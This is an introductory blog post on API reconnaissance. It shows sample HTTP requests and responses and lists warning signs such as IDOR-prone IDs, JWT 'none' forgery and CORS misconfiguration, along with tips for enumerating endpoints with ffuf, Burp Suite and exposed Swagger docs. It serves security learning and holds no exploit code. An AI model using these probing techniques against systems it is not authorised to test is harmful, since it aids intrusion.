Skip to main content

Think like a Developer: API Hacking

๐Ÿ” What Does an API Look Like? (Structure Breakdown)

A typical API request looks like this:

GET /v1/user/profile?id=0034 HTTP/1.1
Host: api.example.com
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Content-Type: application/json

Here’s what each part is for and how to spot uniqueness:

Part What It Does How to Identify Why It’s Important
Method (GET/POST) What action the API is taking First word in the request line GET = retrieve, POST = create, PUT = update, DELETE = remove
Endpoint (/v1/...) The resource being accessed Always follows method—URL path Shows version, resource, hierarchy
Query Params (?id=) Filter or identify specific data After ?, in key=value format Can be manipulated or tested for IDOR, SQLi, etc.
Host The server the API lives on Usually api.domain.com Subdomain often used to separate API traffic
Headers Metadata: auth, format, content-type Seen as key: value pairs Auth headers = access control, content headers = data format
Token (JWT/Bearer) Authenticates the request Authorization: Bearer [token] Can be intercepted, decoded, replayed, or forged
Payload (Body) (For POST/PUT) Contains the data being sent JSON, XML, or form data in the body Look for fields, input validation, or hidden logic
Status Code (200, 403) API’s reply—success, fail, error Returned in the response Helps detect broken auth, rate limiting, or abuse

๐Ÿงช Example: API Request & Response (Visual)

Request:

POST /v1/register HTTP/1.1
Host: api.coolapp.io
Authorization: Bearer eyJK...sTR1Ng
Content-Type: application/json

{
  "username": "Friza",
  "email": "friza@example.com",
  "password": "StrongPassword123"
}

Response:

{
  "success": true,
  "user_id": "U-998321",
  "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}

What’s unique?

  • /v1/register — Maybe telling you versioning and function.

  • Bearer token — Signals use of JWTs or OAuth2.

  • Body fields — Might tell you what input is required, or vulnerable.


⚔️ How to Identify a Vulnerable or Valuable API

Clue What It May Reveal
Publicly exposed Swagger docs Endpoint list, methods, schemas, even testing tools
No rate limiting Open to brute force, scraping, DoS
Predictable IDs (user_id=12) Test for IDOR (Insecure Direct Object Reference)
Missing Auth header Means open endpoint (by design or mistake)
Verbose error messages Leak logic or stack trace info
JWT with "none" algorithm Means forgery is possible (exploit!)
CORS misconfigurations Allows cross-site requests, potential hijack


APIs look like professional conversations between systems. The URL structure, method, headers, and response all give tells about security posture, logic flow, and access points. Like how headers can tell, kind of, what containers the operation are contained in. Which to check with critical thinking, let's check what these trained professional ARE trained FOR upon request unfortunately. API reconnaissance or API enumeration is key in both offensive testing and defensive hardening when being revealed what they're trained to do.

1. Endpoints

APIs are trained to perform specific tasks, and those tasks are exposed through endpoints. For example:

GET /api/v1/users
POST /api/v1/login
DELETE /api/v1/user/1345

Each endpoint tells you:

  • What action it's trained to handle

  • Which data it's designed to expose, modify, delete

  • How sensitive the logic or content might be (ex: /delete, /admin, /payments)

๐Ÿง  2. Swagger / OpenAPI / Postman Collections

If you can find a file like:

  • /swagger.json

  • /openapi.yaml

  • /docs

  • /api-docs

You're basically seeing the API’s instruction manual. These docs lay out:

  • What functions it was trained to provide

  • What data it takes in and gives out

  • What verbs (GET, POST, DELETE) it accepts

  • Any authentication mechanisms it expects

๐Ÿ” 3. Passive Clues from Headers & Responses

Even if the API isn’t fully documented, you can watch how it reacts.

For example:

  • Try sending a GET to an unknown endpoint.

  • See if it responds with:
    "Method not allowed" → It knows the path, just not this verb.
    "Unauthorized" → It’s expecting a token.
    "Not found" → It wasn’t trained on this path.

These are tells. Like how a dog trained for guarding reacts to a stranger but not to its owner — the API gives away what it's used to handling.

๐Ÿงช 4. Test for Behavior via Fuzzing or Mapping

You can fuzz or map to discover hidden behavior:

  • Use tools like:

    • ffuf to brute force endpoint paths

    • Burp Suite or Postman to send crafted requests

    • jwt.io to decode tokens and see user roles

If it accepts a certain pattern, it's trained to understand it. If it fails or leaks info, it's trained but poorly.

๐Ÿ”’ 5. Training = Logic = Attack Surface

If an API was trained to:

  • Accept password resets (/forgot-password)

  • Perform file uploads (/upload)

  • Handle role-based logic (/admin, isAdmin: true)

That tells you the risk zones and attack points.


Conclusion

Have a nice day!

Labels:

Comments

Post a Comment

Comment section

Popular posts from this blog

Strip down a Website example, a.k.a. Reverse Engineering skill UNLOCKED

 ๐Ÿง  How a Website Really Works — Broken Down Simply When you open a website like www.example.com , a lot goes on under the hood — but let’s strip it down to the core parts so you see exactly how it runs from top to bottom. ๐Ÿ“ Step 1: You Type a Website into Your Browser When you type a URL (like https://frizasecurity.com ) into your browser and hit Enter, the first thing that happens is: ✅ The browser needs to find the website's IP address. Think of the domain name (like frizasecurity.com ) as a contact name in your phone, and the IP address as the phone number. Your browser asks a DNS server (Domain Name System) to find the number behind that name. You type the name → Browser says: “What’s the IP address for this?” DNS responds: “Here it is: 123.456.789.10 .” ๐Ÿ’ก DNS = like the internet’s phone book. ๐Ÿ”„ Step 2: Your Device Talks to the Server Now that your browser knows the IP address, it sends a request to the web server that hosts the site. Think of the...
Post a Comment
Read more

How to maintain your senior dog.

 So from what I searched from the internet, Microsoft's Search Engine (SE), Bing, "What dogs require to live a long time" and here's what I got. From PetMD , titled "21 Longest-Living Dog Breeds", says on a list, 1. Chihuahua. Life expectancy: 14-16 years. ..." I'mma stop right there. I have an 11-year-old senior chihuahua. If you want to know more about the list, click the link in the text.  #Bluehyperlink, thanks.  Chleo is the name of my dog. I've been trying to change it to Cleo, short for Cleopatra but no matter the case, it's always going to be Chleo. This is her: I believe she's young, healthy, and I'd like to keep my senior dog young forever! T.T, nothings impossible! Anyways, because she is a chihuahua, one mixed with wiener dog. I don't know if that makes a difference but maybe it does to prevent complications. No boast. She cries when my family and I leave for a vacay, I hear that she cries or even howls. Now, she crie...
Post a Comment
Read more

Stitched 'X'

The doll lay down on the floor with its deep diamond aquatic eyes, placed on a pile of clothes as I folded them while sitting down. Something about it was deep, I thought. Until I heard someone or something step inside the room. Then I heard a mediocrely heavy door shut, thinking that it was on its own at the time without using context. The one who shut the door was a man that I knew who was doing his best to stand tall. In fact, maybe as the tallest in the room. As soon as I tried to greet him back into our home, my heart felt heavy. When I tried to open my mouth, even a peep... I felt something familiar as if my heart was about to ache. I couldn't speak, and my heart had started aching. Afraid, not wanting to tell my partner, I had remembered the promise I made to him. So I told him everything and when I did, my breath was shallow, and my heart was hurting again. Although, he looked down on me from his height when I stood up. He didn't want me to say a word to him like usual....
Post a Comment
Read more